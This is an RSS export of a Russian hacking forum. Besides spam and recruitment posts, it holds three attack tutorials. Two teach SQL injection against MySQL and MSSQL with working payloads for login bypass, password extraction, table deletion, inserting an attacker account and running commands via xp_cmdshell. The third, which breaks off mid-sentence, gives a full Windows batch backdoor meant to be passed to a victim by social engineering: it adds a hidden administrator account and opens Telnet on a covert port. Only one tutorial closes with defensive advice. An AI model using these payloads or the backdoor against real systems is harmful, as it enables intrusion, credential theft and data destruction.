http://xhackx.bbon.ru/ Программирование.... ru-ru Fri, 17 Mar 2023 14:29:44 +0300 MyBB/mybb.ru http://xhackx.bbon.ru/viewtopic.php?pid=80#p80 <p>Компьютеры, ноутбуки - техника современная и не застрахована от поломок. К такому типу техники нужен своевременный и комплексный подход, который могут обеспечить наши компетентные мастера. Самостоятельно починить компьютер сможет 5 человек из 100, а поломки происходят у каждого второго! Мы предоставляем услуги высокого качества по ремонту и исправлению проблем компьютерной техники более чем в 60 городах по РФ. Так же наши филиалы представлены в Республике Беларусь. Заявки обрабатываются нашими сотрудниками и не перепродаются в сторонние компании. Перейти:&#160; <a href="https://rempc-v-mo.ru/?t=33705" rel="nofollow" target="_blank">https://rempc-v-mo.ru/?t=33705</a></p> mybb@mybb.ru (zahswtkjpd) Fri, 17 Mar 2023 14:29:44 +0300 http://xhackx.bbon.ru/viewtopic.php?pid=80#p80 http://xhackx.bbon.ru/viewtopic.php?pid=79#p79 <p>возьмите меня администратором</p> mybb@mybb.ru (Рустем) Wed, 30 Mar 2011 04:46:32 +0400 http://xhackx.bbon.ru/viewtopic.php?pid=79#p79 http://xhackx.bbon.ru/viewtopic.php?pid=45#p45 <p>ВОТ!!!</p> mybb@mybb.ru (admin) Sat, 25 Apr 2009 09:26:39 +0400 http://xhackx.bbon.ru/viewtopic.php?pid=45#p45 http://xhackx.bbon.ru/viewtopic.php?pid=38#p38 <p>НАБОР!!!НАБОР!!!НАБОР!!!НАБОР!!!НАБОР!!!НАБОР!!!НАБОР!!!</p> mybb@mybb.ru (admin) Sat, 14 Mar 2009 11:35:18 +0300 http://xhackx.bbon.ru/viewtopic.php?pid=38#p38 http://xhackx.bbon.ru/viewtopic.php?pid=37#p37 <p>НАБИРАЕМ ЛЮДЕЙ В АДМИНИСТРАЦИЮ САЙТА.....<br />РАНГ ЗАВИСИТ ОТ УРОВНЯ ЗНАНИЯ КОМПЬЮТЕРА....<br />ПРЕДЛОЖЕНИЯ ПИСАТЬ ТУТ...</p> mybb@mybb.ru (admin) Sat, 14 Mar 2009 08:49:23 +0300 http://xhackx.bbon.ru/viewtopic.php?pid=37#p37 http://xhackx.bbon.ru/viewtopic.php?pid=36#p36 <p>то может сделать взломщик используя SQL injection</p> <p>С каждым днем все больше скриптов используют базы данных, все больше хостингов доверяют пароли своих клиентов SQL-базам, все больше популярных сайтов переходит на публичные форумы и движки, работающие с MySQL. Но далеко не все ясно представляют себе, насколько опасным может быть непродуманное использование MySQL в скриптах.</p> <p>Как это есть?</p> <p>Без знаний основ языка SQL трудно что-либо понять. Прежде всего разберемся, в чем заключается суть атаки типа SQL injection. К примеру, на атакуемом сервере стоит следующий PHP-скрипт, который на основе поля category_id делает выборку заголовков статей из таблицы articles и выводит их пользователю:</p> <p>//подключаемся к MySQL</p> <p>mysql_connect($dbhost, $dbuname, $dbpass) or die(mysql_error());</p> <p>mysql_select_db($dbname) or die(mysql_error());</p> <p>$cid=$_GET[&quot;cid&quot;];</p> <p>$result=mysql_query(&quot;SELECT article_id, article_title FROM articles where category_id=$cid&quot;); // &lt;- уязвимый запрос</p> <p>while( $out = mysql_fetch_array( $result)):</p> <p>echo &quot;Статья: &quot;.$out['article_id'].&quot; &quot;.$out['article_title'].&quot;&lt;br&gt;&quot;;</p> <p>endwhile;</p> <p>//выводим результат в виде списка</p> <p>В переводе с языка MySQL запрос звучит так: &quot;ВЫБРАТЬ ид_статей, заголовки_статей ИЗ таблицы_статей ГДЕ ид_категории равно $cid&quot;. На первый взгляд все верно, по ссылке типа <a href="http://serv.com/read.php?cid=3" rel="nofollow" target="_blank">http://serv.com/read.php?cid=3</a> скрипт работает нормально и выводит пользователю список статей, принадлежащих категории 3.</p> <p>Но что если пользователь - никакой не пользователь, а обыкновенный хакер? Тогда он сделает запрос <a href="http://serv.com/read.php?cid=3'" rel="nofollow" target="_blank">http://serv.com/read.php?cid=3'</a> (именно с кавычкой) и получит что-то вроде: Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /usr/local/apache/htdocs/read.php on line 14.</p> <p>Почему ошибка? Посмотрим, что запросил PHP у MySQL. Переменная $cid равна 1', тогда запрос принимает неверный с точки зрения MySQL вид: SELECT article_id, article_title FROM articles where category_id=1'. При синтаксической ошибке в запросе MySQL отвечает строкой &quot;ERROR 1064: You have an error in your SQL syntax...&quot;. PHP не может распознать этот ответ и сообщает об ошибке, на основе которой хакер может судить о присутствии уязвимости типа SQL Injection. Очевидно, что злоумышленник получит возможность задавать переменной $cid любые значения ($cid=$_GET[cid]) и, следовательно, модифицировать запрос к MySQL. Например, если $cid будет равна &quot;1 OR 1&quot; (без кавычек в начале и в конце), то MySQL выдаст все записи, независимо от category_id, так как запрос будет иметь вид (..) where category_id=1 OR 1. То есть либо category_id = 1 (подойдут лишь записи с category_id, равными 1), либо 1 (подойдут все записи, так как число больше нуля - всегда истина).</p> <p>Только что описанные действия как раз и называются SQL Injection - иньекция SQL-кода в запрос скрипта к MySQL. С помощью SQL Injection злоумышленник может получить доступ к тем данным, к которым имеет доступ уязвимый скрипт: пароли к закрытой части сайта, информация о кредитных картах, пароль к админке и т.д. Хакер при удачном для него стечении обстоятельств получит возможность выполнять команды на сервере.</p> <p>Как атакуют?</p> <p>Классический пример уязвимости типа SQL Injection - следующий запрос: SELECT * FROM admins WHERE login='$login' AND password=MD5('$password').</p> <p>Допустим, он будет проверять подлинность введенных реквизитов для входа в админскую часть какого-нибудь форума. Переменные $login и $password являются логином и паролем соответственно, и пользователь вводит их в HTML-форму. PHP посылает рассматриваемый запрос и проверяет: если количество возвращенных от MySQL записей больше нуля, то админ с такими реквизитами существует, а пользователь авторизуется, если иначе (таких записей нет и логин/пароль неверные) - пользователя направят на fsb.ru.</p> <p>Как взломщик использует SQL Injection в этом случае? Все элементарно. Злоумышленнику требуется, чтобы MySQL вернул PHP-скрипту хотя бы одну запись. Значит, необходимо модифицировать запрос так, чтобы выбирались все записи таблицы независимо от правильности введенных реквизитов. Вспоминаем фишку с &quot;OR 1&quot;. Кроме того, в MySQL, как и в любом языке, существуют комментарии. Комментарии обозначаются либо --комментарий (комментарий в конце строки), либо /*комментарий*/ (комментарий где угодно). Причем если второй тип комментария стоит в конце строки, закрывающий знак '*/' необязателен. Итак, взломщик введет в качестве логина строку anyword' OR 1/*, а в качестве пароля - anyword2. Тогда запрос принимает такой вид: SELECT * FROM admins WHERE login='anyword' OR 1/* AND password=MD5('anyword2'). А в переводе на человеческий язык: ВЫБРАТЬ все ИЗ таблицы_admins ГДЕ логин равен 'anyword' ИЛИ 1, а остальное воспринимается как комментарий, что позволяет отсечь ненужную часть запроса. В результате MySQL вернет все записи из таблицы admins даже независимо от того, существует админ с логином anyword или нет, и скрипт пропустит хакера в админку. Такая уязвимость была обнаружена, например, в Advanced Guestbook. Она позволяла войти в администраторскую часть не зная пароля и внутри нее читать файлы. Но SQL Injection этого типа обычно не позволяют злоумышленнику получить данные из таблицы.</p> <p>Union и MySQL версии 4</p> <p>Вернемся к скрипту получения заголовков статей. На самом деле он позволяет взломщику получить гораздо больше, чем список всех статей. Дело в том, что в MySQL версии 4 добавлен новый оператор - UNION, который используется для объединения результатов работы нескольких команд SELECT в один набор результатов. Например: SELECT article_id, article_title FROM articles UNION SELECT id, title FROM polls. В результате MySQL возвращает N записей, где N - количество записей из результата запроса слева плюс количество записей из результата запроса справа. И все это в том порядке, в каком идут запросы, отделяемые UNION.</p> <p>Но существуют некоторые ограничения по использованию UNION:</p> <p>1. число указываемых столбцов во всех запросах должно быть одинаковым: недопутимо, чтобы первый запрос выбирал, например, id, name, title, а второй только article_title;</p> <p>2. типы указываемых столбцов одного запроса должны соответствовать типам указываемых столбцов остальных запросов: если в одном запросе выбираются столбцы типа INT, TEXT, TEXT, TINYTEXT, то и в остальных запросах должны выбираться столбцы такого же типа и в таком же порядке;</p> <p>3. UNION не может идти после операторов LIMIT и ORDER.</p> <p>Так как же UNION может стать пособником злоумышленника? В нашем скрипте присутствует запрос &quot;SELECT article_id, article_title FROM articles where category_id=$cid&quot;. Что мешает хакеру, используя SQL injection, вставить еще один SELECT-запрос и выбрать нужные ему данные? Правильно: ничего!</p> <p>Допустим, цель хакера - получить логины и пароли всех авторов, которые могут добавлять статьи. Есть скрипт чтения списка статей <a href="http://serv.com/read.php?cid=1," rel="nofollow" target="_blank">http://serv.com/read.php?cid=1,</a> подверженный SQL injection. Первым делом хакер узнает версию MySQL, с которой работает скрипт. Для этого он сделает следующий запрос: <a href="http://serv.com/read.php?cid=1+/*!40000+AND+0*/." rel="nofollow" target="_blank">http://serv.com/read.php?cid=1+/*!40000+AND+0*/.</a> Если скрипт вернет пустую страницу, значит, версия MySQL &gt;= 4. Почему именно так? Число 40000 - версия MySQL, записанная без точек. Если версия, которая стоит на сервере, больше или равна этому числу, то заключенный в /**/ код выполнится как часть запроса. В результате ни одна запись не подойдет под запрос и скрипт не вернет ничего. Зная версию MySQL, хакер сделает вывод о том, сработает фишка с UNION или нет. В случае если MySQL третьей версии, фишка работать не будет. В нашем случае MySQL &gt;= 4 и злоумышленник все-таки воспользуется UNION.</p> <p>Для начала взломщик составит верный UNION-запрос, то есть подберет действительное количество указываемых столбцов, которое бы совпало с количеством указываемых столбцов левого запроса (вспоминай правила работы с UNION). Хакер не имеет в распоряжении исходников скрипта (если, конечно, скрипт не публичный) и поэтому не знает, какой именно запрос шлет скрипт к MySQL. Придется подбирать вручную - модифицировать запрос вот таким образом: <a href="http://serv.com/read.php?cid=1+UNION+SELECT+1." rel="nofollow" target="_blank">http://serv.com/read.php?cid=1+UNION+SELECT+1.</a> И тут о своем присутствии объявит ошибка, так как количество запрашиваемых столбцов не совпадает. Хакер увеличивает количество столбцов еще на единицу: <a href="http://serv.com/read.php?cid=1+UNION+SELECT+1,2" rel="nofollow" target="_blank">http://serv.com/read.php?cid=1+UNION+SELECT+1,2</a> - получает список статей из категории 1, а также в самом конце две цифры: 1 и 2. Следовательно, он верно подобрал запрос.</p> <p>Посмотрим на модифицированный запрос от PHP к MySQL: SELECT article_id, article_title FROM articles where category_id=1 UNION SELECT 1,2. В ответ MySQL возвращает результат первого SELECT (список статей) и результат второго SELECT - число &quot;1&quot; в первом столбце и &quot;2&quot; во втором столбце (SELECT+1,2). Другими словами, теперь, подставляя вместо '1' и '2' реальные имена столбцов из любой таблицы, можно будет заполучить их значения.</p> <p>Составив верный SELECT+UNION запрос, хакер постарается подобрать название таблицы с нужными ему данными. Например, таблица с данными пользователей будет, скорее всего, называться users, Users, accounts, members, admins, а таблица с данными о кредитных картах - cc, orders, customers, orderlog и т.д. Для этого злоумышленник сделает следующий запрос: <a href="http://serv.com/read.php?cid=1+UNION+SELECT+1,2+FROM+users." rel="nofollow" target="_blank">http://serv.com/read.php?cid=1+UNION+SE &#8230; ROM+users.</a> И если таблица users существует, то PHP-скрипт выполнится без ошибок и выведет список статей плюс '1 2', иначе - выдаст ошибку. Так можно подбирать имена таблиц до тех пор, пока не будет найдена нужная.</p> <p>В нашем случае &quot;нужная&quot; таблица – это authors, в которой хранятся данные об авторе: имя автора, его логин и пароль. Теперь задача хакера - подобрать правильные имена столбцов с нужными ему данными, чаще всего с логином и паролем. Имена столбцов он станет подбирать по аналогии с именем таблицы, то есть для логина столбец, скорее всего, будет называться login или username, а для пароля - password, passw и т.д. Запрос будет выглядеть так: <a href="http://serv.com/read.php?cid=1+UNION+SELECT+1,login+from+authors." rel="nofollow" target="_blank">http://serv.com/read.php?cid=1+UNION+SE &#8230; m+authors.</a></p> <p>Почему хакер не стал вставлять имя столбца вместо единицы? Ему нужна текстовая информация (логин, пароль), а в нашем случае в левом запросе SELECT на первом месте идет article_id, имеющий тип INT. Следовательно, в правом запросе хакер не может ставить на первое место имя столбца с текстовой информацией (правила UNION).</p> <p>Итак, выполнив запрос <a href="http://serv.com/read.php?cid=1+UNION+SELECT+1,login+from+authors," rel="nofollow" target="_blank">http://serv.com/read.php?cid=1+UNION+SE &#8230; m+authors,</a> взломщик находит список логинов всех авторов, а подставив поле password - список паролей. И получает желанные логины и пароли авторов, а админ сервера – подмоченную репутацию. Но это только в нашем примере Фортуна улыбнулась злоумышленнику так широко: он быстро подобрал количество столбцов, а в реальной жизни количество столбцов может достигать 30-40.</p> <p>UNION и нюансы</p> <p>Теперь рассмотрим некоторые ситуации, в которых использование UNION затруднено по тем или иным причинам.</p> <p>Ситуация 1</p> <p>Левый запрос возвращает лишь числовое значение. Что-то вроде SELECT code FROM artciles WHERE id = $id. Что будет делать хакер? Средства MySQL позволяют проводить различные действия над строками, к примеру, выделение подстроки, склеивание нескольких строк в одну, перевод из CHAR в INT и т.п. Благодаря этим функциям хакер имеет возможность выудить интересующую его информацию по одному символу. К примеру, требуется достать пароль из таблицы admins, используя приведенный выше запрос. Чтобы получить ASCII-код первого символа пароля, сделаем следующий запрос к скрипту: <a href="http://127.0.0.1/read.php?cid=1+union+select+ASCII" rel="nofollow" target="_blank">http://127.0.0.1/read.php?cid=1+union+select+ASCII</a>(SUBSTRING(password,1,1))+from+admins. Функция SUBSTRING(name,$a,$b) в MySQL выделяет $b символов из значения столбца name начиная с символа под номером $a. Функция ASCII($x) возвращает ASCII-код символа $x. Для получения последующих символов следует просто менять второй параметр функции SUBSTRING до тех пор, пока ответом не будет 0. Подобный способ был использован в эксплойте для одной из версий phpBB.</p> <p>Ситуация 2</p> <p>SQL Injection находится в середине SQL-запроса. Например: SELECT code FROM artciles WHERE id = $id AND blah='NO' AND active='Y' LIMIT 10. Для правильной эксплуатации хакер просто откомментирует идущий следом за Injection код, то есть к вставляемому коду добавит /* или --. Пробелы в запросе взломщик может заменить на /**/, что полезно в случае если скрипт фильтрует пробелы.</p> <p>Ситуация 3</p> <p>Случается и такое, что в PHP-коде подряд идет несколько SQL-запросов, подверженных Injection. И все они используют переменную, в которую злоумышленник вставляет SQL-код. Например (опускаю PHP):</p> <p>$result=mysql_query(&quot;SELECT article_id, article_title FROM articles where category_id=$cid&quot;);</p> <p>//php code here</p> <p>$result=mysql_query(&quot;SELECT article_name FROM articles where category_id=$cid&quot;);</p> <p>//тут вывод результата</p> <p>Это довольно неприятно для хакера, так как для первого запроса SQL Injection пройдет нормально, а для второго UNION - уже нет, так как количество запрашиваемых столбцов отличается. И если программист, писавший код, предусмотрел остановку скрипта в случае ошибки типа &quot;... or die(&quot;Database error!&quot;)&quot;, то эксплуатация обычными методами невозможна, так как скрипт остановится раньше, чем будет выведет результат.</p> <p>Ситуация 4</p> <p>Скрипт выводит не весь результат запроса, а, например, только первую запись. И если хакер будет прямо пользоваться UNION, то скрипт выдаст только первую запись из ответа MySQL, а остальное отбросит, в том числе результат SQL Injection. Для того чтоб преодолеть все препятствия и на этом этапе, хакер передаст левому запросу такой параметр для WHERE, чтобы в ответ на него MySQL не вернул ни одной записи.</p> <p>Например, есть такой запрос: SELECT name FROM authors WHERE id=$id. После SQL Injection он будет выглядеть следующим образом: (..) id=1 UNION SELECT password FROM authors. Но PHP-скрипт выведет только первую запись, поэтому вставляемый код следует модифицировать: (..) id=-12345 UNION SELECT (..). Теперь в ответ на левый запрос MySQL не вернет ничего, а в ответ на правый - желанные для хакера данные.</p> <p>Ситуация 5</p> <p>Скрипт не выводит результат запроса. Например, есть скрипт, который выводит какие-либо статистические данные, например, количество авторов, принадлежащих к определенной группе. Причем количество записей он считает не с помощью MySQL-функции COUNT, а в самом скрипте. Скрипт шлет MySQL такой запрос: SELECT id FROM authors where category_id=$cid.</p> <p>Допустим, скрипт возвращает что-то вроде &quot;Найдено десять авторов в данной категории&quot;. В этом случае злоумышленник будет эксплуатировать SQL injection, конечно же, методом перебора символов! Например, хакеру надо получить пароль автора с id = 1, для чего потребуется перебирать каждый символ пароля. Но как получить символ, если PHP не выводит ничего из того, что возвратил MySQL?</p> <p>Рассмотрим такой запрос: SELECT id FROM authors where category_id=-1 UNION SELECT 1,2 FROM authors WHERE id=1 AND ASCII(SUBSTRING(password,1,1))&gt;109. Результатом запроса будет одна запись, если ASCII-код первого символа пароля больше 109, и ноль записей, если больше, либо равна. Итак, методом бинарного поиска нетрудно найти нужный символ. Почему хакер использует знаки &quot;больше/меньше&quot;, а не &quot;равно&quot;? Если взломщику надо получить 32-символьный хэш пароля, ему придется делать примерно 32*25 запросов! Метод бинарного поиска позволяет сократить это число в два раза. Само собой, делать запросы хакер будет уже не руками, а с помощью скрипта, автоматизирующего перебор.</p> <p>MySQL версии 3</p> <p>Несмотря на отсутствие в третьей версии оператора UNION, и из нее хакер сможет вытащить то, чем интересуется. В осуществлении этого замысла помогут подзапросы и перебор символов, но описание этого метода займет еще пару листов (которых мне не дали). Поэтому ищи статьи на эту тему на wwwrst.void.ru (автор 1dt.w0lf) и wwwsecuritylab.ru (автор Phoenix).</p> <p>Как защищаться?</p> <p>Правило №1. Фильтруй входные данные. Кавычку заменяй на слеш-кавычку(\'), слеш - на слеш-слеш. В PHP это делается или включением magic_quotes_gpc в php.ini, или функцией addslashes(). В Perl: $id=~s/(['\\])/\\$1/g;. И на всякий случай: $id=~s/[a-zA-z]//g; - для числовых параметров.</p> <p>Правило №2. Не дай кому не надо внедрить SQL-код! Заключай в кавычки все переменные в запросе. Например, SELECT * FROM users WHERE id='$id'.</p> <p>Правило №3. Отключи вывод сообщений об ошибках. Некоторые программисты, наоборот, делают так, что при ошибке скрипт выводит сообщение самого MySQL, или, еще ужасней, - ВЕСЬ SQL-запрос. Это предоставляет злодею дополнительную информацию о структуре базы и существенно облегчает эксплуатацию.</p> <p>Правило №4. Никогда не разрешай скриптам работать с MySQL от root. Ничего хорошего не выйдет, если хакер получит доступ ко всей базе.</p> <p>Правило №5. Запускай публичные скрипты от отдельного пользователя с отдельной базой. Неприятно будет, если какой-нибудь кидди, воспользовавшись 0day-дырой в форуме, получит доступ к базе с СС твоих клиентов.</p> <p>Правило №6. Отключи MySQL-пользователю привилегию FILE - не дай хакеру записать в файл что-то вроде &lt;?system($_GET[cmd])?&gt; через MySQL.</p> <p>Правило №7. Не называй таблицы и базы данных в соответствии с их назначением, чтоб утаить от чужих глаз настоящие названия. В публичных скриптах часто предоставляют возможность установить prefix для названия таблиц - устанавливай самый сложный. Если кто-нибудь и найдет SQL injection, то не сможет ее эксплуатировать.</p> <p>Чаще всего уязвимости оставляют в тех запросах, параметры которых передаются через hidden формы в HTML и через cookies, видимо, из-за того, что они не видны пользователю и не так привлекают внимание злодеев.</p> <p>Часто забывают про SQL Injection в функции Reply, о поиске сообщений пользователя в форумах, в репортах различных сервисов. В 80% WAP-сервисов SQL injection находят по десять штук в каждом скрипте (наверное, админы думают, что туда только через сотовые ходят). На самом деле многие недооценивают SQL Injection. Известен случай, когда обычная SQL injection в скрипте репорта привела к реальному руту на трех серверах и дампу гиговой базы. А всего-то SQL Injection…</p> <p>Статьи по теме</p> <p>inattack.ru/group_article/34.html<br />wwwrst.void.ru/papers/sql-inj.txt<br />wwwsecuritylab.ru/49424.html<br />wwwsecuritylab.ru/49660.html</p> <p>Все чаще администраторы получают возможности убедиться в том, что знания по безопасности запросов к MySQL не менее важны, чем эффективное использование этих запросов.</p> <p>Защитить свою базу от хакеров можно – нужно только грамотно следовать определенным правилам по нейтрализации подобных атак.</p> <p>С помощью UNION хакер может легко узнать пользователя, базу данных и версию MySQL, для чего используются функции user(), database() и version() соответственно. Взломщик просто сделает запрос типа SELECT user().</p> <p>Даже если в обороне есть брешь, можно дезинформировать противника присваивая переменным нелогичные названия. Тогда их будет просто невозможно подобрать.</p> <p>Чем ты больше знаешь о том, как ломают, тем проще предотвратить взлом.</p> <p>Регулярно просматривай новостные сайты по безопасности, чтобы быть в курсе вновь изобретенных способов взлома и не допускать утечек ценной информации.</p> mybb@mybb.ru (admin) Fri, 13 Mar 2009 16:31:25 +0300 http://xhackx.bbon.ru/viewtopic.php?pid=36#p36 http://xhackx.bbon.ru/viewtopic.php?pid=35#p35 <p>Взято с <a href="http://copol.narod.ru" rel="nofollow" target="_blank">http://copol.narod.ru</a></p> <p>Объектом нашего внимания станут базы данных SQL которые активно используются для организации работы сложных Web приложений. Нашим заданием станет манипулирование SQL запросом. Вот небольшой пример...<br />Вы зашли на сайт, где требуется авторизация. Все, что от вас требуется это ввести правильный логин и пас. Но что делать, если таковых в наличии не имеется? Ту вступает в силу такой раздел, как SQL Injection. Допустим введенные данные проверяются таким SQL запросом:</p> <p>$result=mysql_db_query($db,&quot;SELECT * FROM $table WHERE user='$login' AND <br />pass='$password'&quot;); </p> <p>$num_rows=mysql_num_rows($result); </p> <p>mysql_close($link); </p> <p>if ($num_rows!=0) </p> <p>&#160; &#160;{ // AUTHENTICATION OK } <br />else </p> <p>&#160; &#160;{ // AUTHENTICATION ERROR } </p> <p>(пример взят с пятого уровня NGSec Game)</p> <p>Когда мы вводим данные то наш SQL запрос будет иметь такой вид:</p> <p>SELECT * FROM users WHERE user='admin' AND pass='admin' </p> <p>Где &quot;admin&quot; введенный логин, а &quot;admin&quot; пароль. Как вы думаете что произойдет, если ввести имя пользователя например &quot;adm'in&quot;. Давайте посмотрим какой запрос получится на этот раз...</p> <p>SELECT * FROM users WHERE user='adm'in' AND pass='admin' </p> <p>На этот раз мы получим сообщение об ошибке, что-то вроде этого </p> <p>Server: Msg 170, Level </p> <p>15, State 1, Line 1 <br />Line 1: Incorrect syntax near 'in'. </p> <p>Значит все ок, данный скрпт не проверяет входные данные. А теперь немного логики и мы имеем такое условие:</p> <p>if ((true=false) or (true=true)) then .. </p> <p>Это условие будет всегда </p> <p>верным. А что если в запросе место логина ввести такую шнягу &quot;admin' or ' '=' '- </p> <p>-&quot;, где &quot;--&quot; означает конец запроса? Получится вот что: </p> <p>SELECT * FROM </p> <p>users WHERE user='admin' or ' '=' '--AND pass='admin' </p> <p>Oh no! Мы вошли не зная ни пароля, ни логина :). Прикол в том что вот какой запрос у нас вышел: если логин admin есть в базе данных или пробел равен пробелу, тогда авторизация прошла успешно, ни о каком пароле речь не идет, так как на этом запрос считается оконченным :)</p> <p>Надеюсь все понятно? А теперь немного дикой практики... Если ввести логин &quot;admin'; drop table $table--&quot; то мы удалим базу данных. Но все не так просто. А если ее название хранится в ругой переменной или прописано в самом коде, что тогда? Надо узнать имя БД... Чтобы продолжить будем анализировать ODBC сообщения об ошибках, приступим... Введем логин &quot; ' having 1=1--&quot; на что сервер обругается где-то так:</p> <p>Microsoft OLE DB Provider for ODBC Drivers error '80040e14' <br />[Microsoft][ODBC </p> <p>SQL Server Driver][SQL Server] <br />Column 'users.status' is invalid in the </p> <p>select list because it is not contained <br />in an aggregate function and there </p> <p>is no GROUP BY clause. </p> <p>Теперь нам известно, что имя базы данных &quot;users&quot;, а первая колонка называется &quot;status&quot;. Неплохо, тоесть снести все нахрен мы уже сможем :), но давайте попробуем добавить себя в базу данных, чтобы потом не парится. Но чтобы себя добавить нам надо знать количество и название полей. Давайте введем такое чудо:</p> <p>&quot; ' group by users.id having </p> <p>1=1--&quot;</p> <p>Получим вот что:</p> <p>Column 'users.username' is invalid in the select list because it is not contained in </p> <p>either an aggregate function or the GROUP BY clause. </p> <p>Значит нам теперь известно второе поле, дальше... набиваем:</p> <p>&quot; ' group by users.status, users.username having </p> <p>1=1--&quot;</p> <p>и так последовательно узнаем все поля, до тех пор пока в ответ мы не получим ошибки. Допустим это получилось и</p> <p>&quot; ' group by users.status, </p> <p>users.username, users.password, users.mail having 1=1--&quot;</p> <p>не вызвало ошибок. Отлично! Значит все поля это status, username, password и mail. Но теперь мы должны узнать тип используемый для каждого поля. Введем место логина такое:</p> <p>&quot; ' union select sum(username) from users--&quot;</p> <p>и что мы видим? А вот что :</p> <p>The sum or average aggregate operation cannot take a </p> <p>varchar data type as an argument. </p> <p>А значит это что username это varchar, то бишь строка. Теперь набиваем:</p> <p>&quot; ' union select sum(status) from </p> <p>users--&quot;.</p> <p>Смотрим на результат:</p> <p>All queries in an SQL statement containing a UNION operator must have an </p> <p>equal number of expressions in their target lists.</p> <p>&#160; &#160; &#160; &#160; &#160; &#160; <br />Это значит что поле status - число. Все теперь добавляем </p> <p>себя, пишем вместо логина</p> <p>&#160; &#160; &#160; &#160; &#160; &#160; <br />&quot; '; insert into users values( 0, 'xakep', </p> <p>'g00r00', 'xakep@xakep.ru')--&quot;</p> <p>&#160; &#160; &#160; &#160; &#160; &#160; <br />Вс, </p> <p>считайте дело сделано. Но и это еще не все! Мы можем исполнять команды. Делается </p> <p>это так:</p> <p>&#160; &#160; &#160; &#160; &#160; &#160; <br />&quot; '; exec master..xp_cmdshell 'ping 127.0.0.1' --&quot;.</p> <p>&#160; &#160; &#160; &#160; &#160; &#160; <br />Но </p> <p>результатов мы не увидим. Что делать? Можно написать следующее:</p> <p>&#160; &#160; &#160; &#160; &#160; &#160; <br />&quot; '; EXEC </p> <p>master..sp_makewebtask &quot;127.0.0.1dataresult.html&quot;, </p> <p>&quot;SELECT * FROM INFORMATION_SCHEMA.TABLES&quot; &quot;. </p> <p>&#160; &#160; &#160; &#160; &#160; &#160; <br />Где 127.0.0.1 IP компьютера с расшареной папкой data. Это не все возможности, это основы. </p> <p>Все остальное по этой теме можно найти в инете. Как избежать этого? Смотри пример на ASP: </p> <p>&#160; &#160; &#160; &#160; &#160; &#160; <br />function validatepassword( input ) <br />good_password_chars </p> <p>=&quot;abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789&quot; </p> <p>validatepassword = true <br />for i = 1 to len( input ) <br />&#160; &#160; &#160; &#160; c = mid( input, i, 1 ) <br />if ( InStr( good_password_chars, c ) = 0 ) then <br />&#160; &#160; validatepassword = false <br />&#160; &#160; exit function <br />end if <br /> next </p> <p>&#160; &#160; &#160; &#160; &#160; &#160; end function</p> mybb@mybb.ru (admin) Fri, 13 Mar 2009 16:27:31 +0300 http://xhackx.bbon.ru/viewtopic.php?pid=35#p35 http://xhackx.bbon.ru/viewtopic.php?pid=34#p34 <p>Всем привет! Все больше и больше я вижу, как новички задают одни и те же вопросы на форуме, в чате, в аськах, такие как: Что такое телнет? Как им пользоваться? Зачем он нужен? Поэтому я решил в помощь им написать эту статью. В этой статье я попробую объяснить как с помощью такого универсального сервиса, как телнет, можно проникнуть в файловую систему удалённого по сети компа, и полностью управлять им, отдавая команды. Но прежде чем действовать давайте узнаем, что за такая служба телнет.</p> <p>Телнет - сетевой протокол для работы в удаленной системе в терминальном <br />режиме(т.е. режиме командной строки). Все делается &quot;ручками&quot;, мыши отдыхают,только текстовый обмен информацией. Он один из важнейших средств, пользоваться которым должен научиться каждый хакер прежде, чем он подумает о взломе серверов. Этот протокол может быть использован для подключения к удаленным компьютерам и запуска программ из командной строки, просто вводя команды в GUI окне. Telnet не использует ресурсы клиентской машины, но он использует ресурсы сервера, с которым соединился клиент. В основном это программа, эмулирующая терминал,<br />позволяющая нам подключаться к удаленным компьютерам.</p> <p>Ну а теперь как вы уже наверно догадались эту службу и необходимо открывать у <br />жертвы. Бывает такое, что этот сервис уже будет весить у &quot;врага&quot;, но при попытки <br />подключится 90% того, что он потребует пасс, можно конечно попробовать брутить, <br />но вероятность успеха очень маленькая. Для взлома можно воспользоваться таким <br />методом как социальная инженерия(СИ). Я думаю не надо объяснять что это такое. <br />Если вы думаете, что СИ никак не относится к хакерству то вы ошибаетесь, этот <br />метод в данном случае наиболее актуален. <br />Для того, чтобы открыть телнет, жертве необходимо будет запустить созданый <br />тобой файл, который ей можно подарить. При запуске его он пропишит нужный тебе <br />порт, на котором будет висеть телнет, нужный логин и пасс. Его можно запросто <br />написать на языке Bat, т.е. язык команд в GUI окне в среде Windows(режим командной <br />строки).<br />тело батника:</p> <p>chcp 1251<br />net user SUPPORT_388945a0 /delete<br />net user hacker hack /add<br />net localgroup Администраторы hacker /add<br />net localgroup Пользователи SUPPORT_388945a0 /del<br />regedit /s conf.reg<br />sc config tlntsvr start= auto<br />tlntadmn config port=972 sec=-NTLM<br />net start Telnet</p> <p>все это пишешь в блокноте, и сохраняем как *.bat</p> <p>Теперь пояснения:<br />chcp 1251- меняет кодировку на 1251, так как батник написан не в дос кодировке.<br />net user SUPPORT_388945a0 /delete и<br />net localgroup Пользователи SUPPORT_388945a0 /del - удаляют стандартную <br />первоначальную виндосовскую учетку, которая есть в xp prof и в 2003 server.<br />net user hacker hack /add и<br />net localgroup Администраторы hacker /add - не трудно догадаться, что этими <br />командами создаётся новая учетная запись с админскими правами, <br />где логин: hacker<br />пасс: hack<br />Так как при создании нового админа он будет виден в welcome screen'е, отключить его <br />можно импортировав<br />рег файл в реестр, следующего содержания:<br />Содержимое conf.re<br />Windows Registry Editor Version 5.00<br />[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows <br />NTCurrentVersionWinlogonSpecialAccountsUserLis t]<br />&quot;hacker&quot;=dword:00000000<br />Сервис телнет по умолчанию отключен, но есть такая команда sc config tlntsvr start= <br />auto которая<br />меняет тип его запуска на автоматический(по дефолту disabled ).<br />При запуске телнета, он ставится на стандартный свой 23-ий порт, но увы это <br />палевно, поэтому советую прописывать этой командой tlntadmn config port=972 <br />sec=-NTLM , редко используемый порт. В нашем случае это 972.<br />Ну вот все настройки и конфигурация сервиса завершена, и эта строка net start Telnet <br />окончательно запустит наш бэкдор.</p> <p>теперь проверим правильный ли синтаксис кода. Открываем командную строку, если <br />она потерялась можно найти её здесь c:WINDOWSsystem32cmd.exe. Вставляем код, <br />запускаем и смотрим нет ли ошибок. Убедится что все ок, еще можно так: <br />Пуск -&gt; Выполнить -&gt; пишем services.msc -&gt; Ok <br />Там ты видишь запуск, остановку и настройку служб Windows. Выбираешь Telnet, и <br />смотришь её свойства. При необходимости в любой момент можно её отключить.</p> <p>Вот батник готов, и как ты видишь он слишком палевны, 